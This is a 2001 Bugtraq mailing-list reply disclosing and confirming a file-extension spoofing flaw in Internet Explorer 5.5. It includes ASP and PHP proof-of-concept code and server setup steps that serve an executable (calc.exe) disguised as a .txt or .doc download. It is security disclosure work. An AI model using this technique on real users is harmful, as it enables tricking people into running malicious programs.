[23315] in bugtraq
RE: File extensions spoofable in MSIE download dialog
daemon@ATHENA.MIT.EDU (Jonathan G. Lampe)
Thu Nov 29 16:19:37 2001
Message-Id: <5.1.0.14.0.20011129115328.00ae0e70@mail.stdnet.com>
Date: Thu, 29 Nov 2001 12:34:50 -0600
To: bugtraq@securityfocus.com, static@tampabay.rr.com
From: "Jonathan G. Lampe" <jonathan@stdnet.com>
Cc: jouko@solutions.fi, security@microsoft.com, stephen@stdnet.com,
tips@brianlivingston.com
In-Reply-To: <20011128215132.A1379@milla.xStatiCa.com>
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"; format=flowed
I have confirmed Jouko Pynnonen's and StatiC's findings that IE 5.5 sp 2
allows executables to run as soon as a user has elected to open what
appears to be a normally harmless ".txt" file. (IE 5.5 trusts the filename
provided in the link over the filename suggested by the header's filename
tag and/or the use of an "application/octet-stream" content type.)
This bug/hole should be a compelling reason for anyone still running IE 5.5
or less to either upgrade to IE 6.0 (which still did not appear to have
this problem when last checked) or finally make the move to Netscape,
Opera, etc. (It's about as much work no matter which company/version you
choose.)
Here is the ASP equivalent code to StatiC's php tidbit (tested under both
IIS 4 and 5):
<%
Const adTypeBinary = 1
Dim strFilePath
Response.ContentType = "application/octet-stream"
Response.AddHeader "Content-Disposition","attachment; filename=calc.exe"
strFilePath = Server.MapPath(".") & "\calc.exe"
Set objStream = Server.CreateObject("ADODB.Stream")
objStream.Open
objStream.Type = adTypeBinary
objStream.LoadFromFile strFilePath
Response.BinaryWrite objStream.Read
objStream.Close
Set objStream = Nothing
%>
Additionally, you can see this code in action here:
http://208.212.86.151/test.doc
(Note that the bug/hole does not just "trust" .txt extensions - .doc, .log
are but a few of the other ones you can slip by most users.)
- Jonathan Lampe - jonathan@stdnet.com - Standard Networks, Inc.- 608-227-6100
(Thanks to Stephen Nickels for the public posting.)
At 08:51 PM 11/28/2001, you wrote:
>I was playing with apache configs a few months ago and noticed a similar
>issue with IE5.5. The procodure below will cause IE5.5 to display the
>open dialog for readme.txt but once opened, it executes immediately on
>IE5.5 sp2 with no hint that it is really getting an executable file called
>calc.exe. I only tested it with IE5.5.
>
>With an apache/php server add .txt to the already existing .php extension
>in the apache.conf file, so that apache will recognise .txt extensions as
>php script files.
>
>1. Copy the real windows calc.exe from a windows system to the html root dir.
>
>2. Copy the readme.txt file below to the same html root dir.
>
>3. go to the url http://yourserver/readme.txt
>
>You will see the same behavior mentioned in the previous alert.
>
>FILE <readme.txt> BEGIN ----
><?php
>Header("Content-type: application/octet-stream");
>Header("Content-Disposition: attachment; filename=calc.exe");
>readfile("calc.exe");
>?>
>FILE <readme.txt> END ----
>
>Why does microsoft think it is wise to trust the filename in the url over
>what the header content-type is set to for display purposes since the
>content-type seems to take priority for what will really happen with the file.
>
>StatiC
